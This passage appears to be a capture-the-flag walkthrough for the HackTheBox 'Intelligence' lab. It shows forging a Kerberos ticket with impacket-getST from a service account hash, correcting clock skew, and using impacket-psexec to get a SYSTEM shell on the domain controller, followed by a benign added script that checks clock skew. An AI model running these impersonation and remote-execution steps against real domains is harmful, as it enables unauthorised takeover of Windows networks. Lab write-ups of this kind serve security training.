Silver Ticket
impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes :c699eaac79b69357d9dabee3379547e6 -impersonate Administrator
If you get this error:
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
You only need to update your clock, which we do with:
sudo apt-get install ntpdate
sudo ntpdate 10.10.10.248
=> 1 Nov 05:23:45 ntpdate[295766]: step time server 10.10.10.248 offset +25202.808937 sec
# ANOTHER OPTION
sudo apt-get install chrony
sudo timedatectl set-ntp true
sudo ntpdate <machine IP>
Export the variable pointing to the generated file
export KRB5CCNAME=Administrator.ccache
Getting a shell
impacket-psexec intelligence.htb/Administrator@dc.intelligence.htb -k -no-pass
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file UmMXtxAq.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service JzWD on dc.intelligence.htb.....
[*] Starting service JzWD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
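The KRB_AP_ERR_SKEW step above, as an added example that is not part of the original page: this script parses ntpdate output and reports whether the local clock is outside the default 5-minute Kerberos tolerance, which is why the +25202 s offset shown earlier made the TGT request fail. The function names and the 300-second limit (the default, assumed unchanged on the target domain) are assumptions of this example.

```shell
#!/bin/sh
# Added example: decide from ntpdate output whether the local clock is
# outside the Kerberos clock-skew tolerance.

# Default tolerance is 5 minutes (300 s).
# Assumption: the domain has not changed this policy.
MAX_SKEW_SECONDS=300

# extract_offset: read ntpdate output on stdin and print the last absolute
# offset in seconds. Handles "... offset +25202.808937 sec" and the
# "server X, stratum N, offset -0.004, delay 0.02" lines printed by -q.
extract_offset() {
    awk '{
        for (i = 1; i < NF; i++)
            if ($i == "offset") {
                v = $(i + 1)
                gsub(/[+,]/, "", v)   # drop a leading "+" or trailing ","
                v = v + 0             # force numeric comparison
                if (v < 0) v = -v
                found = v; seen = 1
            }
    }
    END { if (!seen) exit 1; printf "%.3f\n", found }'
}

# skew_status: print SKEW, OK or UNKNOWN for the ntpdate output on stdin.
# Exit status: 0 = within tolerance, 1 = skew too great, 2 = no offset found.
skew_status() {
    _off=$(extract_offset) || { echo "UNKNOWN"; return 2; }
    if awk -v o="$_off" -v m="$MAX_SKEW_SECONDS" 'BEGIN { exit !(o > m) }'; then
        echo "SKEW"
        return 1
    fi
    echo "OK"
}

# The ntpdate line shown on this page (offset of about 7 hours).
SAMPLE_LINE=' 1 Nov 05:23:45 ntpdate[295766]: step time server 10.10.10.248 offset +25202.808937 sec'

# Demo on the page's own line; live use would be:
#   ntpdate -q 10.10.10.248 | skew_status
status=$(printf '%s\n' "$SAMPLE_LINE" | skew_status) || true
echo "page sample: $status"
```

Running `ntpdate -q` first only queries the server, so the offset can be checked without changing the local clock.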